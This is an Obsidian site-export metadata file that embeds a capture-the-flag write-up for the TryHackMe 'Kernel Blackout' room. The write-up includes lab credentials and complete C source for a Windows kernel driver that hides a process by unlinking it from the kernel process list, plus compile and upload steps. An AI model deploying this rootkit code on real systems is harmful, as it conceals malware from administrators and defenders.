{"createdTime":1770171626947,"shownInTree":["images/2026-02-03_17-31.png","images/2026-02-03_17-31.html","images/2026-02-03_18-09.png","images/2026-02-03_18-09.html","images/2026-02-03_18-10.png","images/2026-02-03_18-10.html","images/2026-02-04_18-15.png","images/2026-02-04_18-15.html","kernel-blackout.html"],"attachments":["images/2026-02-03_17-31.png","images/2026-02-03_18-09.png","images/2026-02-03_18-10.png","images/2026-02-04_18-15.png","site-lib/scripts/graph-wasm.wasm","site-lib/fonts/70cc7ff27245e82ad414.ttf","site-lib/fonts/454577c22304619db035.ttf","site-lib/fonts/52ac8f3034507f1d9e53.ttf","site-lib/fonts/05b618077343fbbd92b7.ttf","site-lib/fonts/4bb6ac751d1c5478ff3a.woff2","site-lib/fonts/c504db5c06caaf7cdfba.woff2","site-lib/fonts/01dcbad1bac635f9c9cd.woff2","site-lib/media/6155340132a851f6089e.svg","site-lib/media/2308ab1944a6bfa5c5b8.svg","site-lib/html/file-tree-content.html","site-lib/scripts/webpage.js","site-lib/scripts/graph-wasm.js","site-lib/scripts/graph-render-worker.js","site-lib/media/favicon.png","site-lib/styles/obsidian.css","site-lib/styles/global-variable-styles.css","site-lib/styles/main-styles.css","site-lib/rss.xml"],"allFiles":["kernel-blackout.html","images/2026-02-04_18-15.png","images/2026-02-04_18-15.html","images/2026-02-03_18-10.png","images/2026-02-03_18-10.html","images/2026-02-03_18-09.png","images/2026-02-03_18-09.html","images/2026-02-03_17-31.png","images/2026-02-03_17-31.html","site-lib/scripts/graph-wasm.wasm","site-lib/fonts/70cc7ff27245e82ad414.ttf","site-lib/fonts/454577c22304619db035.ttf","site-lib/fonts/52ac8f3034507f1d9e53.ttf","site-lib/fonts/05b618077343fbbd92b7.ttf","site-lib/fonts/4bb6ac751d1c5478ff3a.woff2","site-lib/fonts/c504db5c06caaf7cdfba.woff2","site-lib/fonts/01dcbad1bac635f9c9cd.woff2","site-lib/media/6155340132a851f6089e.svg","site-lib/media/2308ab1944a6bfa5c5b8.svg","site-lib/html/file-tree-content.html","site-lib/scripts/webpage.js","site-lib/scripts/graph-wasm.js","site-lib/scripts/graph-render-worker.js","site-lib/media/favicon.png","site-lib/styles/obsidian.css","site-lib/styles/global-variable-styles.css","site-lib/styles/main-styles.css"],"webpages":{"images/2026-02-03_17-31.html":{"title":"2026-02-03_17-31","icon":"","description":"<img src=\"images/2026-02-03_17-31.png\" target=\"_self\">","aliases":[],"inlineTags":[],"frontmatterTags":[],"headers":[],"links":[],"author":"","coverImageURL":"images/2026-02-03_17-31.png","fullURL":"images/2026-02-03_17-31.html","pathToRoot":"..","attachments":["images/2026-02-03_17-31.html"],"createdTime":1770129100447,"modifiedTime":1770129100535,"sourceSize":437586,"sourcePath":"images/2026-02-03_17-31.png","exportPath":"images/2026-02-03_17-31.html","showInTree":true,"treeOrder":1,"backlinks":["kernel-blackout.html"],"type":"attachment"},"images/2026-02-03_18-09.html":{"title":"2026-02-03_18-09","icon":"","description":"<img src=\"images/2026-02-03_18-09.png\" target=\"_self\">","aliases":[],"inlineTags":[],"frontmatterTags":[],"headers":[],"links":[],"author":"","coverImageURL":"images/2026-02-03_18-09.png","fullURL":"images/2026-02-03_18-09.html","pathToRoot":"..","attachments":["images/2026-02-03_18-09.html"],"createdTime":1770131349678,"modifiedTime":1770131349726,"sourceSize":225271,"sourcePath":"images/2026-02-03_18-09.png","exportPath":"images/2026-02-03_18-09.html","showInTree":true,"treeOrder":2,"backlinks":[],"type":"attachment"},"images/2026-02-03_18-10.html":{"title":"2026-02-03_18-10","icon":"","description":"<img src=\"images/2026-02-03_18-10.png\" target=\"_self\">","aliases":[],"inlineTags":[],"frontmatterTags":[],"headers":[],"links":[],"author":"","coverImageURL":"images/2026-02-03_18-10.png","fullURL":"images/2026-02-03_18-10.html","pathToRoot":"..","attachments":["images/2026-02-03_18-10.html"],"createdTime":1770131435041,"modifiedTime":1770131435093,"sourceSize":226431,"sourcePath":"images/2026-02-03_18-10.png","exportPath":"images/2026-02-03_18-10.html","showInTree":true,"treeOrder":3,"backlinks":[],"type":"attachment"},"images/2026-02-04_18-15.html":{"title":"2026-02-04_18-15","icon":"","description":"<img src=\"images/2026-02-04_18-15.png\" target=\"_self\">","aliases":[],"inlineTags":[],"frontmatterTags":[],"headers":[],"links":[],"author":"","coverImageURL":"images/2026-02-04_18-15.png","fullURL":"images/2026-02-04_18-15.html","pathToRoot":"..","attachments":["images/2026-02-04_18-15.html"],"createdTime":1770170381582,"modifiedTime":1770170381605,"sourceSize":25671,"sourcePath":"images/2026-02-04_18-15.png","exportPath":"images/2026-02-04_18-15.html","showInTree":true,"treeOrder":4,"backlinks":["kernel-blackout.html"],"type":"attachment"},"kernel-blackout.html":{"title":"Kernel-Blackout","icon":"","description":"Platform: TryHackMe\nRoom: Kernel Blackout\nDifficulty: Hard\nObjective: Build a Windows kernel driver to hide a specific process using Direct Kernel Object Manipulation (DKOM)\nTechniques: Windows kernel programming, EPROCESS structure manipulation, DKOM\nCategory: Binary Exploitation / Windows Internals\nDevelopment Machine: 10.200.150.20 Target Machine: 10.200.150.10 Username: Administrator Password: KernelKernel2323 Connect to the development machine using Windows Remote Desktop Protocol (RDP). Once connected, you'll find Visual Studio and necessary development tools installed.Create a Windows kernel driver (.sys file) that hides the implant.exe process from system process listings. The process must continue running but become invisible to tools like Task Manager and process explorers.Windows maintains all active processes in a doubly-linked list within kernel memory. Each process is represented by an _EPROCESS structure containing various fields including process information and list pointers.Key Offsets Provided:\nActiveProcessLinks: Offset 0x2e8 (points to the list entry structure) ImageFileName: Offset 0x450 (contains the process name) These offsets are specific to the Windows version in the challenge and are crucial for successful manipulation.Create a C file rootflag.c:#include &lt;ntddk.h&gt;\n#include &lt;wdm.h&gt; #define LINKS_OFFSET 0x2e8 #define NAME_OFFSET 0x450 void DriverUnload(PDRIVER_OBJECT DriverObject) { UNREFERENCED_PARAMETER(DriverObject);\n} NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(RegistryPath); PEPROCESS CurrentProcess = PsInitialSystemProcess; for (int i = 0; i &lt; 2000; i++) { char* currentName = (char*)CurrentProcess + NAME_OFFSET; if (strncmp(currentName, \"implant.exe\", 11) == 0) { PLIST_ENTRY CurrentListEntry = (PLIST_ENTRY)((char*)CurrentProcess + LINKS_OFFSET); PLIST_ENTRY Prev = CurrentListEntry-&gt;Blink; PLIST_ENTRY Next = CurrentListEntry-&gt;Flink; Prev-&gt;Flink = Next; Next-&gt;Blink = Prev; CurrentListEntry-&gt;Flink = CurrentListEntry; CurrentListEntry-&gt;Blink = CurrentListEntry; break; } PLIST_ENTRY CurrentListEntry = (PLIST_ENTRY)((char*)CurrentProcess + LINKS_OFFSET); CurrentProcess = (PEPROCESS)((char*)CurrentListEntry-&gt;Flink - LINKS_OFFSET); } return STATUS_SUCCESS;\n} Start Point: Begin from PsInitialSystemProcess (the System process)\nIteration: Loop through the process list with safety limit\nIdentification: Check process name at offset 0x450\nManipulation: When target found, modify its list pointers\nSafety: Point removed process to itself to avoid crashes\nOpen Command Prompt and run:cl /W4 /D_AMD64_ /D_WIN64 /D_KERNEL_MODE rootflag.c /I\"C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.19041.0\\km\" /I\"C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.19041.0\\shared\" /link /driver /entry:DriverEntry /subsystem:native /out:hide.sys \"C:\\Program Files (x86)\\Windows Kits\\10\\Lib\\10.0.19041.0\\km\\x64\\ntoskrnl.lib\"\n<img alt=\"2026-02-04_18-15.png\" src=\"images/2026-02-04_18-15.png\" target=\"_self\">\nOpen browser on development machine\nNavigate to http://10.200.150.10\nUpload the compiled hide.sys file\nSystem automatically loads the driver Refresh the web page implant.exe should disappear from process list Flag appears automatically upon successful hiding <br><img alt=\"2026-02-03_17-31.png\" src=\"images/2026-02-03_17-31.png\" target=\"_self\">Direct Kernel Object Manipulation involves:\nLocating target process in kernel memory\nAccessing its ActiveProcessLinks structure\nModifying forward/backward pointers to skip the target\nMaintaining list integrity to prevent system crashes Offsets must match Windows version exactly Must include DriverUnload function for cleanup Iteration limits prevent infinite loops Self-referencing pointers ensure system stability This challenge demonstrates practical Windows kernel exploitation techniques. The solution involves writing a minimal kernel driver that manipulates system structures to hide processes. Successful completion requires understanding Windows internals, kernel programming, and safe memory manipulation techniques.Files Created:\nrootflag.c - Source code hide.sys - Compiled driver Success Indicators: Driver compiles without errors Driver uploads successfully Process disappears from listing System remains stable Flag obtained ","aliases":[],"inlineTags":[],"frontmatterTags":[],"headers":[{"heading":"<strong>Kernel Blackout CTF Write-up</strong>","level":1,"id":"**Kernel_Blackout_CTF_Write-up**_0"},{"heading":"<strong>Challenge Information</strong>","level":2,"id":"**Challenge_Information**_0"},{"heading":"<strong>Initial Setup and Environment</strong>","level":2,"id":"**Initial_Setup_and_Environment**_0"},{"heading":"<strong>Access Credentials</strong>","level":3,"id":"**Access_Credentials**_0"},{"heading":"<strong>Connection Method</strong>","level":3,"id":"**Connection_Method**_0"},{"heading":"<strong>Understanding the Core Challenge</strong>","level":2,"id":"**Understanding_the_Core_Challenge**_0"},{"heading":"<strong>The Objective</strong>","level":3,"id":"**The_Objective**_0"},{"heading":"<strong>Technical Background</strong>","level":3,"id":"**Technical_Background**_0"},{"heading":"<strong>Creating the Kernel Driver</strong>","level":2,"id":"**Creating_the_Kernel_Driver**_0"},{"heading":"<strong>Source Code Implementation</strong>","level":3,"id":"**Source_Code_Implementation**_0"},{"heading":"<strong>Code Explanation</strong>","level":3,"id":"**Code_Explanation**_0"},{"heading":"<strong>Compilation Process</strong>","level":2,"id":"**Compilation_Process**_0"},{"heading":"<strong>Compilation Command</strong>","level":3,"id":"**Compilation_Command**_0"},{"heading":"<strong>Deployment and Testing</strong>","level":2,"id":"**Deployment_and_Testing**_0"},{"heading":"<strong>Upload to Target</strong>","level":3,"id":"**Upload_to_Target**_0"},{"heading":"<strong>Verification</strong>","level":3,"id":"**Verification**_0"},{"heading":"<strong>Technical Details</strong>","level":2,"id":"**Technical_Details**_0"},{"heading":"<strong>DKOM Technique</strong>","level":3,"id":"**DKOM_Technique**_0"},{"heading":"<strong>Critical Considerations</strong>","level":3,"id":"**Critical_Considerations**_0"},{"heading":"<strong>Conclusion</strong>","level":2,"id":"**Conclusion**_0"}],"links":[],"author":"","coverImageURL":"images/2026-02-04_18-15.png","fullURL":"kernel-blackout.html","pathToRoot":".","attachments":["images/2026-02-04_18-15.html","images/2026-02-03_17-31.html"],"createdTime":1770130615376,"modifiedTime":1770171437406,"sourceSize":5543,"sourcePath":"Kernel-Blackout.md","exportPath":"kernel-blackout.html","showInTree":true,"treeOrder":5,"backlinks":[],"type":"markdown"}},"fileInfo":{"images/2026-02-03_17-31.png":{"createdTime":1770129100447,"modifiedTime":1770129100535,"sourceSize":437586,"sourcePath":"images/2026-02-03_17-31.png","exportPath":"images/2026-02-03_17-31.png","showInTree":true,"treeOrder":0,"backlinks":[],"type":"media","data":null},"images/2026-02-03_17-31.html":{"createdTime":1770129100447,"modifiedTime":1770129100535,"sourceSize":437586,"sourcePath":"images/2026-02-03_17-31.png","exportPath":"images/2026-02-03_17-31.html","showInTree":true,"treeOrder":1,"backlinks":["kernel-blackout.html"],"type":"attachment","data":null},"images/2026-02-03_18-09.png":{"createdTime":1770131349678,"modifiedTime":1770131349726,"sourceSize":225271,"sourcePath":"images/2026-02-03_18-09.png","exportPath":"images/2026-02-03_18-09.png","showInTree":true,"treeOrder":0,"backlinks":[],"type":"media","data":null},"images/2026-02-03_18-09.html":{"createdTime":1770131349678,"modifiedTime":1770131349726,"sourceSize":225271,"sourcePath":"images/2026-02-03_18-09.png","exportPath":"images/2026-02-03_18-09.html","showInTree":true,"treeOrder":2,"backlinks":[],"type":"attachment","data":null},"images/2026-02-03_18-10.png":{"createdTime":1770131435041,"modifiedTime":1770131435093,"sourceSize":226431,"sourcePath":"images/2026-02-03_18-10.png","exportPath":"images/2026-02-03_18-10.png","showInTree":true,"treeOrder":0,"backlinks":[],"type":"media","data":null},"images/2026-02-03_18-10.html":{"createdTime":1770131435041,"modifiedTime":1770131435093,"sourceSize":226431,"sourcePath":"images/2026-02-03_18-10.png","exportPath":"images/2026-02-03_18-10.html","showInTree":true,"treeOrder":3,"backlinks":[],"type":"attachment","data":null},"images/2026-02-04_18-15.png":{"createdTime":1770170381582,"modifiedTime":1770170381605,"sourceSize":25671,"sourcePath":"images/2026-02-04_18-15.png","exportPath":"images/2026-02-04_18-15.png","showInTree":true,"treeOrder":0,"backlinks":[],"type":"media","data":null},"images/2026-02-04_18-15.html":{"createdTime":1770170381582,"modifiedTime":1770170381605,"sourceSize":25671,"sourcePath":"images/2026-02-04_18-15.png","exportPath":"images/2026-02-04_18-15.html","showInTree":true,"treeOrder":4,"backlinks":["kernel-blackout.html"],"type":"attachment","data":null},"kernel-blackout.html":{"createdTime":1770130615376,"modifiedTime":1770171437406,"sourceSize":5543,"sourcePath":"Kernel-Blackout.md","exportPath":"kernel-blackout.html","showInTree":true,"treeOrder":5,"backlinks":[],"type":"markdown","data":null},"site-lib/scripts/graph-wasm.wasm":{"createdTime":1770171484794,"modifiedTime":1770171481485.33,"sourceSize":23655,"sourcePath":"","exportPath":"site-lib/scripts/graph-wasm.wasm","showInTree":false,"treeOrder":0,"backlinks":[],"type":"other","data":null},"site-lib/fonts/70cc7ff27245e82ad414.ttf":{"createdTime":1770171626870,"modifiedTime":1770171626870,"sourceSize":192740,"sourcePath":"","exportPath":"site-lib/fonts/70cc7ff27245e82ad414.ttf","showInTree":false,"treeOrder":0,"backlinks":[],"type":"font","data":null},"site-lib/fonts/454577c22304619db035.ttf":{"createdTime":1770171626868,"modifiedTime":1770171626868,"sourceSize":161376,"sourcePath":"","exportPath":"site-lib/fonts/454577c22304619db035.ttf","showInTree":false,"treeOrder":0,"backlinks":[],"type":"font","data":null},"site-lib/fonts/52ac8f3034507f1d9e53.ttf":{"createdTime":1770171626870,"modifiedTime":1770171626870,"sourceSize":191568,"sourcePath":"","exportPath":"site-lib/fonts/52ac8f3034507f1d9e53.ttf","showInTree":false,"treeOrder":0,"backlinks":[],"type":"font","data":null},"site-lib/fonts/05b618077343fbbd92b7.ttf":{"createdTime":1770171626869,"modifiedTime":1770171626869,"sourceSize":155288,"sourcePath":"","exportPath":"site-lib/fonts/05b618077343fbbd92b7.ttf","showInTree":false,"treeOrder":0,"backlinks":[],"type":"font","data":null},"site-lib/fonts/4bb6ac751d1c5478ff3a.woff2":{"createdTime":1770171626866,"modifiedTime":1770171626866,"sourceSize":7876,"sourcePath":"","exportPath":"site-lib/fonts/4bb6ac751d1c5478ff3a.woff2","showInTree":false,"treeOrder":0,"backlinks":[],"type":"font","data":null},"site-lib/fonts/c504db5c06caaf7cdfba.woff2":{"createdTime":1770171626869,"modifiedTime":1770171626869,"sourceSize":352240,"sourcePath":"","exportPath":"site-lib/fonts/c504db5c06caaf7cdfba.woff2","showInTree":false,"treeOrder":0,"backlinks":[],"type":"font","data":null},"site-lib/fonts/01dcbad1bac635f9c9cd.woff2":{"createdTime":1770171626869,"modifiedTime":1770171626869,"sourceSize":387976,"sourcePath":"","exportPath":"site-lib/fonts/01dcbad1bac635f9c9cd.woff2","showInTree":false,"treeOrder":0,"backlinks":[],"type":"font","data":null},"site-lib/media/6155340132a851f6089e.svg":{"createdTime":1770171626867,"modifiedTime":1770171626867,"sourceSize":315,"sourcePath":"","exportPath":"site-lib/media/6155340132a851f6089e.svg","showInTree":false,"treeOrder":0,"backlinks":[],"type":"media","data":null},"site-lib/media/2308ab1944a6bfa5c5b8.svg":{"createdTime":1770171626867,"modifiedTime":1770171626867,"sourceSize":278,"sourcePath":"","exportPath":"site-lib/media/2308ab1944a6bfa5c5b8.svg","showInTree":false,"treeOrder":0,"backlinks":[],"type":"media","data":null},"site-lib/html/file-tree-content.html":{"createdTime":1770171626987,"modifiedTime":1770171626987,"sourceSize":2883,"sourcePath":"","exportPath":"site-lib/html/file-tree-content.html","showInTree":false,"treeOrder":0,"backlinks":[],"type":"html","data":null},"site-lib/scripts/webpage.js":{"createdTime":1770171485296,"modifiedTime":1770171485296,"sourceSize":110729,"sourcePath":"","exportPath":"site-lib/scripts/webpage.js","showInTree":false,"treeOrder":0,"backlinks":[],"type":"script","data":null},"site-lib/scripts/graph-wasm.js":{"createdTime":1770171485296,"modifiedTime":1770171485296,"sourceSize":12885,"sourcePath":"","exportPath":"site-lib/scripts/graph-wasm.js","showInTree":false,"treeOrder":0,"backlinks":[],"type":"script","data":null},"site-lib/scripts/graph-render-worker.js":{"createdTime":1770171485296,"modifiedTime":1770171485296,"sourceSize":5681,"sourcePath":"","exportPath":"site-lib/scripts/graph-render-worker.js","showInTree":false,"treeOrder":0,"backlinks":[],"type":"script","data":null},"site-lib/media/favicon.png":{"createdTime":1770171626793,"modifiedTime":1770171626793,"sourceSize":1105,"sourcePath":"","exportPath":"site-lib/media/favicon.png","showInTree":false,"treeOrder":0,"backlinks":[],"type":"media","data":null},"site-lib/styles/obsidian.css":{"createdTime":1770171626946,"modifiedTime":1770171626946,"sourceSize":213605,"sourcePath":"","exportPath":"site-lib/styles/obsidian.css","showInTree":false,"treeOrder":0,"backlinks":[],"type":"style","data":null},"site-lib/styles/global-variable-styles.css":{"createdTime":1770171626856,"modifiedTime":1770171626856,"sourceSize":305,"sourcePath":"","exportPath":"site-lib/styles/global-variable-styles.css","showInTree":false,"treeOrder":0,"backlinks":[],"type":"style","data":null},"site-lib/styles/main-styles.css":{"createdTime":1770171485321,"modifiedTime":1770171485321,"sourceSize":19521,"sourcePath":"","exportPath":"site-lib/styles/main-styles.css","showInTree":false,"treeOrder":0,"backlinks":[],"type":"style","data":null},"site-lib/rss.xml":{"createdTime":1770171627454,"modifiedTime":1770171627454,"sourceSize":7509,"sourcePath":"","exportPath":"site-lib/rss.xml","showInTree":false,"treeOrder":0,"backlinks":[],"type":"other","data":null}},"sourceToTarget":{"images/2026-02-03_17-31.png":"images/2026-02-03_17-31.html","images/2026-02-03_18-09.png":"images/2026-02-03_18-09.html","images/2026-02-03_18-10.png":"images/2026-02-03_18-10.html","images/2026-02-04_18-15.png":"images/2026-02-04_18-15.html","Kernel-Blackout.md":"kernel-blackout.html","":"site-lib/rss.xml"},"featureOptions":{"backlinks":{"featureId":"backlinks","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":".footer","type":"start","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"displayTitle":"Backlinks","info_displayTitle":{"show":true,"name":"","description":"Descriptive title to show above the feature","placeholder":""}},"tags":{"featureId":"tags","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":".header .data-bar","type":"end","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"displayTitle":"","info_displayTitle":{"show":true,"name":"","description":"Descriptive title to show above the feature","placeholder":""},"showInlineTags":true,"showFrontmatterTags":true,"info_showInlineTags":{"show":true,"name":"","description":"Show tags defined inside the document at the top of the page.","placeholder":""},"info_showFrontmatterTags":{"show":true,"name":"","description":"Show tags defined in the frontmatter of the document at the top of the page.","placeholder":""}},"alias":{"featureId":"aliases","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":".header .data-bar","type":"start","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"displayTitle":"Aliases","info_displayTitle":{"show":true,"name":"","description":"Descriptive title to show above the feature","placeholder":""}},"properties":{"featureId":"properties","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":".header","type":"start","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"displayTitle":"Properties","info_displayTitle":{"show":true,"name":"","description":"Descriptive title to show above the feature","placeholder":""},"info_hideProperties":{"show":true,"name":"","description":"A list of properties to hide from the properties view","placeholder":""}},"fileNavigation":{"featureId":"file-navigation","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":"#left-sidebar-content","type":"end","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"info_includePath":{"show":false,"name":"","description":"","placeholder":""},"showCustomIcons":false,"showDefaultFolderIcons":false,"showDefaultFileIcons":false,"defaultFolderIcon":"lucide//folder","defaultFileIcon":"lucide//file","defaultMediaIcon":"lucide//file-image","exposeStartingPath":true,"info_showCustomIcons":{"show":true,"name":"","description":"Show custom icons for files and folders","placeholder":""},"info_showDefaultFolderIcons":{"show":true,"name":"","description":"Show a default icon of a folder for every folder in the tree","placeholder":""},"info_showDefaultFileIcons":{"show":true,"name":"","description":"Show a default icon of a file for every file in the tree","placeholder":""},"info_defaultFolderIcon":{"show":true,"name":"","description":"The icon to use for folders. Prefix with 'lucide//' to use a Lucide icon","placeholder":""},"info_defaultFileIcon":{"show":true,"name":"","description":"The icon to use for files. Prefix with 'lucide//' to use a Lucide icon","placeholder":""},"info_defaultMediaIcon":{"show":true,"name":"","description":"The icon to use for media files. Prefix with 'lucide//' to use a Lucide icon","placeholder":""},"info_exposeStartingPath":{"show":true,"name":"","description":"Whether or not to show the current file in the file tree when the page is first loaded","placeholder":""},"includePath":"site-lib/html/file-tree.html"},"search":{"featureId":"search","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":"#left-sidebar .topbar-content","type":"start","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"displayTitle":"Search...","info_displayTitle":{"show":true,"name":"","description":"Descriptive title to show above the feature","placeholder":""}},"outline":{"featureId":"outline","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":"#right-sidebar-content","type":"end","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"displayTitle":"Outline","info_displayTitle":{"show":true,"name":"","description":"Descriptive title to show above the feature","placeholder":""},"startCollapsed":false,"minCollapseDepth":0,"info_startCollapsed":{"show":true,"name":"","description":"Should the outline start collapsed?","placeholder":""},"info_minCollapseDepth":{"show":true,"name":"","description":"Only allow outline items to be collapsed if they are at least this many levels deep in the tree.","placeholder":"","dropdownOptions":{"1":1,"2":2,"No Collapse":100}}},"themeToggle":{"featureId":"theme-toggle","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":"#right-sidebar .topbar-content","type":"start","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"displayTitle":"","info_displayTitle":{"show":true,"name":"","description":"Descriptive title to show above the feature","placeholder":""}},"graphView":{"featureId":"graph-view","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":"#right-sidebar-content","type":"start","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"displayTitle":"Graph View","info_displayTitle":{"show":true,"name":"","description":"Descriptive title to show above the feature","placeholder":""},"showOrphanNodes":true,"showAttachments":false,"allowGlobalGraph":true,"allowExpand":true,"attractionForce":1,"linkLength":15,"repulsionForce":80,"centralForce":2,"edgePruning":100,"minNodeRadius":3,"maxNodeRadius":7,"info_showOrphanNodes":{"show":true,"name":"","description":"Show nodes that are not connected to any other nodes.","placeholder":""},"info_showAttachments":{"show":true,"name":"","description":"Show attachments like images and PDFs as nodes in the graph.","placeholder":""},"info_allowGlobalGraph":{"show":true,"name":"","description":"Allow the user to view the global graph of all nodes.","placeholder":""},"info_allowExpand":{"show":true,"name":"","description":"Allow the user to pop-out the graph view to take up the whole screen","placeholder":""},"info_attractionForce":{"show":true,"name":"","description":"How much should linked nodes attract each other? This will make the graph appear more clustered.","placeholder":""},"info_linkLength":{"show":true,"name":"","description":"How long should the links between nodes be? The shorter the links the more connected nodes will cluster together.","placeholder":""},"info_repulsionForce":{"show":true,"name":"","description":"How much should nodes repel each other? This will make disconnected parts more spread out.","placeholder":""},"info_centralForce":{"show":true,"name":"","description":"How much should nodes be attracted to the center? This will make the graph appear more dense and circular.","placeholder":""},"info_edgePruning":{"show":true,"name":"","description":"Edges with a length above this threshold will not be rendered, however they will still contribute to the simulation. This can help large tangled graphs look more organised. Hovering over a node will still display these links.","placeholder":""},"info_minNodeRadius":{"show":true,"name":"","description":"How small should the smallest nodes be? The smaller a node is the less it will attract other nodes.","placeholder":""},"info_maxNodeRadius":{"show":true,"name":"","description":"How large should the largest nodes be? Nodes are sized by how many links they have. The larger a node is the more it will attract other nodes. This can be used to create a good grouping around the most important nodes.","placeholder":""}},"sidebar":{"featureId":"sidebar","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"allowResizing":true,"allowCollapsing":true,"rightDefaultWidth":"20em","leftDefaultWidth":"20em","info_allowResizing":{"show":true,"name":"","description":"Whether or not to allow the sidebars to be resized","placeholder":""},"info_allowCollapsing":{"show":true,"name":"","description":"Whether or not to allow the sidebars to be collapsed","placeholder":""},"info_rightDefaultWidth":{"show":true,"name":"","description":"The default width of the right sidebar","placeholder":""},"info_leftDefaultWidth":{"show":true,"name":"","description":"The default width of the left sidebar","placeholder":""}},"customHead":{"featureId":"custom-head","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"featurePlacement":{"selector":"head","type":"end","info_selector":{"show":true,"name":"","description":"CSS selector for an element. The feature will be placed relative to this element.","placeholder":""},"info_type":{"show":true,"name":"","description":"Will this feature be placed before, after, or inside (at the beggining or end).","placeholder":"","dropdownOptions":{"Before":"before","After":"after","Start":"start","End":"end"}}},"info_featurePlacement":{"show":true,"name":"","description":"Where to place this feature on the page. (Relative to the selector)","placeholder":""},"info_includePath":{"show":false,"name":"","description":"","placeholder":""},"sourcePath":"","info_sourcePath":{"show":true,"name":"","description":"The local path to the source .html file which will be included.","placeholder":"","fileInputOptions":{"makeRelativeToVault":true,"browseButton":true}},"includePath":"site-lib/html/custom-head.html"},"document":{"featureId":"obsidian-document","enabled":true,"unavailable":false,"alwaysEnabled":true,"hideSettingsButton":false,"allowFoldingLists":true,"allowFoldingHeadings":true,"documentWidth":"40em","info_allowFoldingLists":{"show":true,"name":"","description":"Whether or not to allow lists to be folded","placeholder":""},"info_allowFoldingHeadings":{"show":true,"name":"","description":"Whether or not to allow headings to be folded","placeholder":""},"info_documentWidth":{"show":true,"name":"","description":"The width of the document","placeholder":""}},"rss":{"featureId":"rss","enabled":true,"unavailable":false,"alwaysEnabled":false,"hideSettingsButton":false,"siteUrl":"","authorName":"","info_siteUrl":{"show":true,"name":"","description":"The url that this site will be hosted at","placeholder":"https://example.com/mysite"},"info_authorName":{"show":true,"name":"","description":"The name of the author of the 